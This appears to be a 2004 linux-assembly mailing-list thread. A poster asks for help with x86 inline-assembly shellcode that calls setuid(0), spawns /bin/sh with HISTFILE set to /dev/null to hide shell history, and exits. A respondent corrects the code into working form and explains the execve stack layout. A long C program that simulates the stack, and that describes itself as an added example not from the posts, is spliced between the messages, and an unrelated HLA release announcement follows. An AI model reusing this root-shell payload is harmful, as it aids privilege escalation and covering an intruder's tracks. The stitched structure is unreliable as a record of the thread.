* execve with env..
From: Danett song @ 2004-05-27 17:23 UTC (permalink / raw)
To: linux-assembly
Hi,
I'm trying to write, via inline asm, code that will call
setuid and then execve() to run /bin/sh, but it must pass
as the last argument (env) HISTFILE=/dev/null and then
call exit. I wrote this code and it runs, but I don't
know why it doesn't set the env HISTFILE=/dev/null :(
code:
#include <stdio.h>
int main(){
__asm__(
"xor %eax, %eax \n"
"xor %ebx, %ebx \n"
"mov $0x17, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"push %eax \n"
"push $0x68732F2F \n"
"push $0x6E69622F \n"
"mov %esp,%ebx \n"
"push %eax \n"
"push %ebx \n"
"mov %esp, %ecx \n"
"xor %edx, %edx \n"
"push $0x6C6C756E \n"
"push $0x2F2F7665 \n"
"push $0x642F2F3D \n"
"push $0x454C4946 \n"
"push $0x54534948 \n"
"push %eax \n"
"mov %esp, %edx \n"
"mov $0x0b, %al \n"
"int $0x80 \n"
"xor %eax,%eax \n"
"mov $0x01,%al \n"
"int $0x80 \n"
);
return(0);
}
Does anyone know what I'm doing wrong?
Thanks.
* Re: execve with env..
From: fmarmond @ 2004-05-27 19:40 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
I have no time today, but I'll try to help you tomorrow.
Can you provide a commented version of your code?
(just the name of the called interrupt's function, the ASCII you push on the
stack in clear, ...)
It would save me the time of translating your hex into ASCII...
What I can say very quickly is:
"Linux ignores the SUID and SGID bits on scripts." (from the execve man page)
Fred
* Re: execve with env..
From: Danett song @ 2004-05-27 21:05 UTC (permalink / raw)
To: fmarmond; +Cc: linux-assembly
Hi fmarmond,
> I have no time today, but I'll try to help you
> tomorrow.
Thanks a lot! :)
> Can you provide a commented version of your code?
Yeah, look below...
#include <stdio.h>
int main(){
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n"
"push $0x6E69622F \n" // put /bin//bash at stack
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push $0x6C6C756E \n"
"push $0x2F2F7665 \n"
"push $0x642F2F3D \n"
"push $0x454C4946 \n"
"push $0x54534948 \n" // HISTFILE=//dev//null
"push %eax \n" // put zero at stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
return(0);
}
Thanks,
* Re: execve with env..
From: Frederic Marmond @ 2004-05-28 8:54 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
Hi Danett,
I finally had time to have a look at your code.
1st: the translations (hex -> ASCII) you gave were wrong. If you play
with assembly, you have to be rigorous and document your code well.
2nd: have a look at
http://www.linuxfocus.org/English/March2001/article183.shtml (many
language translations available), as it may give you information about
what you seem to want to do.
3rd: have a look at the code. I've modified some lines (my tag is 'FMD')
FMD~ => I changed this line
FMD+ => I added this line
FMD- => I removed this line
__asm__(
"xor %eax, %eax \n" // set 0 to %eax
"xor %ebx, %ebx \n" // 1 arg setuid (zero)
"mov $0x17, %al \n" // call setuid
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // set 0 to %eax
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
// FMD+: FALSE "put /bin//bash at stack"
// FMD+: it is not "bash", but "sh" you give as parameter.
// FMD+: it's not a problem, but please, next time, write correct comments!
"mov %esp,%ebx \n" // Copy 1arg execve
"push %eax \n" // put zero at stack
"push %ebx \n" // put %ebx at stack
"mov %esp, %ecx \n" // Copy 2arg execve
"xor %edx, %edx \n" // set 0 to %edx
"push %eax \n" //FMD+: you forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
// "push $0x54534949 \n" // FMD-: TSII
"push $0x54534948 \n" // FMD+: TSIH
// FMD+: FALSE: "HISTFILE=//dev//null"
// FMD+: wrong hex code, you wrote "IISTFILE=...", instead of "HISTFILE=..."
"mov %esp, %edx \n" // FMD+: back up the string pointer
"push %eax \n" // put zero at stack
"push %edx \n" // FMD+: put the env string here in stack
"mov %esp, %edx \n" // copy 3arg execve
"mov $0x0b, %al \n" // call execve
"int $0x80 \n" // kernel mode
"xor %eax,%eax \n" // 1arg of exit (zero)
"mov $0x01,%al \n" // call exit
"int $0x80 \n" // kernel mode
);
As you can see, a few typos in your comments and hex strings.
But the most important thing is that you have to pass the 3rd argument to execve
exactly as you do its 2nd (char* []).
I hope your intention is not to hack someone else's system, and that you
play with that only for learning purposes...
Keep in mind there is always someone (stronger than you and than me)
who may catch you if you pirate something...
If you have another question, feel free to ask! ;)
Fred
* Re: execve with env..
From: Danett song @ 2004-05-31 18:32 UTC (permalink / raw)
To: fmarmond; +Cc: linux-assembly
Hi Frederic!
First, thanks a lot for your reply.
> 1st: the translations (hex -> ASCII) you gave
> were wrong. If you play
> with assembly, you have to be rigorous and
> document your code well.
I will pay more attention to it...
> 2nd: have a look at
> http://www.linuxfocus.org/English/March2001/article183.shtml
This file is wonderful!! Is the Frederic who wrote it
you?
> As you can see, a few typos in your comments and
> hex strings.
Yeah, for /bin//sh I was really running late for school
and wrote it wrong.. hehehe
> But the most important thing is that you have to pass the 3rd
> argument to execve
> exactly as you do its 2nd (char* []).
Perfect! With a zero after and a zero before the strings..
> I hope your intention is not to hack someone else's
> system, and that you
> play with that only for learning purposes...
Yes, only to learn how exploits, overflows and
shellcode work. If I wanted to hack someone I would use the
leeto shellcodes available on the internet :)
> Keep in mind there is always someone (stronger than
> you and than me)
> who may catch you if you pirate something...
Sure!
> If you have another question, feel free to ask! ;)
Thanks a lot again.
Regards.
* Re: execve with env..
From: Frederic Marmond @ 2004-06-01 8:29 UTC (permalink / raw)
To: Danett song; +Cc: linux-assembly
Danett song wrote:
>>2nd: have a look at
>>http://www.linuxfocus.org/English/March2001/article183.shtml
>
>This file is wonderful!! Is the Frederic who wrote it
>you?
nope, I just found it with google, when I searched for educational stuff
for you.
>>But the most important thing is that you have to pass the 3rd
>>argument to execve
>>exactly as you do its 2nd (char* []).
>
>Perfect! With a zero after and a zero before the strings..
? Er, what do you mean? Are you sure you've understood everything about
passing parameters to execve?
execve needs 3 params:
int execve(const char *filename, char *const argv[], char *const envp[]);
- 1 is a filename (ptr to char, null terminated)
"push %eax \n" // put zero at stack
"push $0x68732F2F \n" // FMD~: hs//
"push $0x6E69622F \n" // FMD~: nib/
"mov %esp,%ebx \n" // Copy 1arg execve
as the stack is in 'reversed order', the first 'push %eax' (which is
zeroed) is the 'null' that will terminate the string.
the 'mov %esp,%ebx' backs up the pointer to the string into %ebx,
which is the 1st arg for the execve system call
- 2 and 3 are null terminated arrays of null terminated strings
the 'null terminated' string (same scheme as above):
"push %eax \n" //FMD+: you forgot this line
"push $0x6C6C756E \n" // FMD~: llun
"push $0x2F2F7665 \n" // FMD~: //ve
"push $0x642F2F3D \n" // FMD~: d//=
"push $0x454C4946 \n" // FMD~: ELIF
"push $0x54534948 \n" // FMD+: TSIH
back up the pointer to this string:
"mov %esp, %edx \n" // FMD+: back up the string pointer
the 'null terminated' array:
last row of the array (null)
"push %eax \n" // put zero at stack
first row of the array (pointer to the string)
"push %edx \n" // FMD+: put the env string here in stack
pointer to the array
"mov %esp, %edx \n" // copy 3arg execve
here, the stack only contains strings and an array of pointers to strings.
parameters are passed to the execve syscall in ebx, ecx and edx
do you get it?
if a particular point is unclear, just ask about it, I'll detail it for you
(I've some free time these days...)
>>I hope your intention is not to hack someone else's
>>system, and that you
>>play with that only for learning purposes...
>
>Yes, only to learn how exploits, overflows and
>shellcode work. If I wanted to hack someone I would use the
>leeto shellcodes available on the internet :)
I played with that (pirating) when I was young, but I find it very
much more exciting to create strong security software than to pirate
badly written software.
If you want to be 'well-known', recognized and famous, you'd better try
to improve software security instead of trying to break it.
And I can tell you there is a lot of fun in that!
>>If you have another question, feel free to ask! ;)
>
>Thanks a lot again.
you're welcome!
Fred
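The stack layout Fred walks through in the message above (and the failure the original question at the top of the thread asks about) is easier to see in a small simulation. The following C program is an added example, not code from any of the posts: it models a hypothetical 128-byte i386 stack as a byte array, replays the push sequence of the first posting and of Fred's corrected version, and then walks the resulting argv/envp the way the kernel does. The names STACK_BYTES, build_env, env_count and fixed_layout_ok are the example's own, and "registers" are plain offsets into the simulated buffer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated i386 stack: a hypothetical 128-byte buffer, not real process memory.
 * Addresses are offsets into mem, so the "registers" below are plain offsets. */
enum { STACK_BYTES = 128 };
struct stack { uint8_t mem[STACK_BYTES]; uint32_t esp; };  /* esp grows toward 0 */

static void stack_init(struct stack *s)
{
    memset(s->mem, 0xAA, sizeof s->mem);   /* junk, so a missing NUL is visible */
    s->esp = STACK_BYTES;
}

/* `push $imm32`: store the dword little-endian at the new, lower esp. */
static uint32_t push32(struct stack *s, uint32_t v)
{
    s->esp -= 4;
    for (int i = 0; i < 4; i++)
        s->mem[s->esp + i] = (uint8_t)(v >> (8 * i));
    return s->esp;
}

static uint32_t load32(const struct stack *s, uint32_t addr)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)s->mem[addr + i] << (8 * i);
    return v;
}

/* View simulated memory as a C string (meaningful only if a NUL follows). */
static const char *str_at(const struct stack *s, uint32_t a) { return (const char *)&s->mem[a]; }

/* Walk a NULL-terminated pointer array the way the kernel walks argv/envp. */
static int count_ptrs(const struct stack *s, uint32_t arr)
{
    int n = 0;
    while (load32(s, arr + 4 * (uint32_t)n) != 0)
        n++;
    return n;
}

/* Common to both versions: filename "/bin//sh" in ebx, argv = {ebx, NULL} in ecx. */
static void push_filename_argv(struct stack *s, uint32_t *ebx, uint32_t *ecx)
{
    push32(s, 0);                  /* NUL terminating the filename */
    push32(s, 0x68732F2F);         /* "//sh" */
    *ebx = push32(s, 0x6E69622F);  /* "/bin"; ebx = &"/bin//sh" */
    push32(s, 0);                  /* argv[1] = NULL */
    *ecx = push32(s, *ebx);        /* argv[0] = ebx; ecx = argv */
}

/* fixed == 0 mirrors the first posting: the string is pushed with no NUL after it
 * and edx is left pointing at a lone zero word, so envp[0] == NULL (empty env).
 * fixed != 0 mirrors Fred's correction: NUL-terminated string, envp = {&str, NULL}. */
static void build_env(struct stack *s, int fixed, uint32_t *ebx, uint32_t *ecx, uint32_t *edx)
{
    stack_init(s);
    push_filename_argv(s, ebx, ecx);
    if (fixed)
        push32(s, 0);              /* the forgotten NUL terminator */
    push32(s, 0x6C6C756E);         /* "null" */
    push32(s, 0x2F2F7665);         /* "ev//" */
    push32(s, 0x642F2F3D);         /* "=//d" */
    push32(s, 0x454C4946);         /* "FILE" */
    uint32_t str = push32(s, 0x54534948);  /* "HIST"; str = &"HISTFILE=//dev//null" */
    *edx = push32(s, 0);           /* original: envp = &0; fixed: envp[1] = NULL */
    if (fixed)
        *edx = push32(s, str);     /* envp[0] = &str; edx = envp */
}

/* Number of environment strings the kernel would see for either version. */
static int env_count(int fixed)
{
    struct stack s; uint32_t ebx, ecx, edx;
    build_env(&s, fixed, &ebx, &ecx, &edx);
    return count_ptrs(&s, edx);
}

/* Does the corrected layout hand execve exactly what the poster intended? */
static int fixed_layout_ok(void)
{
    struct stack s; uint32_t ebx, ecx, edx;
    build_env(&s, 1, &ebx, &ecx, &edx);
    return strcmp(str_at(&s, ebx), "/bin//sh") == 0
        && load32(&s, ecx) == ebx && load32(&s, ecx + 4) == 0
        && strcmp(str_at(&s, load32(&s, edx)), "HISTFILE=//dev//null") == 0;
}

int main(void)
{
    printf("original: kernel sees %d env string(s)\n", env_count(0));
    printf("fixed:    kernel sees %d env string(s), layout %s\n",
           env_count(1), fixed_layout_ok() ? "ok" : "BROKEN");
    return 0;
}
```

Compile with cc -std=c99 and run: the original layout yields 0 environment strings, because edx points straight at the zero word, so /bin/sh starts with an empty environment and HISTFILE is simply never set; the corrected layout yields 1. The doubled slashes in "//sh" and "//dev//null" are only padding so that every pushed word is a full 4-byte immediate containing no NUL byte; Linux collapses repeated slashes during path lookup, so the strings still name /bin/sh and /dev/null.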
* Assembler Developer's Kit (ADK)/HLA v2.0 Update
From: Randall Hyde @ 2004-06-05 17:17 UTC (permalink / raw)
To: linux-assembly
Hi All,
I've just uploaded a new version of the HLA v2.0 source code
(also known as the Assembler Developer's Kit) to Webster. The URL is
http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html
I've added about 25,000 lines of code in this release. The major
changes are support for most of the HLA compile-time functions,
improved record parsing, and tons of defect corrections.
The complete description appears below.
Cheers,
Randy Hyde
----------------------------------------------------------------------------
Hi All,
I've started putting the HLA v2.0 source code on Webster.
Don't get your hopes up, HLA v2.0 is still a *long* way
away at this point. But by putting the source code up on
Webster I hope to achieve four things:
1. People can watch the progress of HLA v2.0 (or lack thereof),
thus encouraging me to keep working on it
2. Those interested in working on the HLA v2.0 open source
project in the future can start studying the source code today
(I intend to open development to others once I get the compile-time
language and declarations parsing finished).
3. Some people are working on other assemblers and have asked
for bits and pieces of the HLA v2.0 source code (because it is
very high performance).
4. Some people are interested in creating their own HLLs and the
HLA declaration parsing code provides a great head start for such languages.
In any case, you can check out HLA v2.0's progress at the following web
page:
http://webster.cs.ucr.edu/AsmTools/RollYourOwn/index.html
Enjoy!
Randy Hyde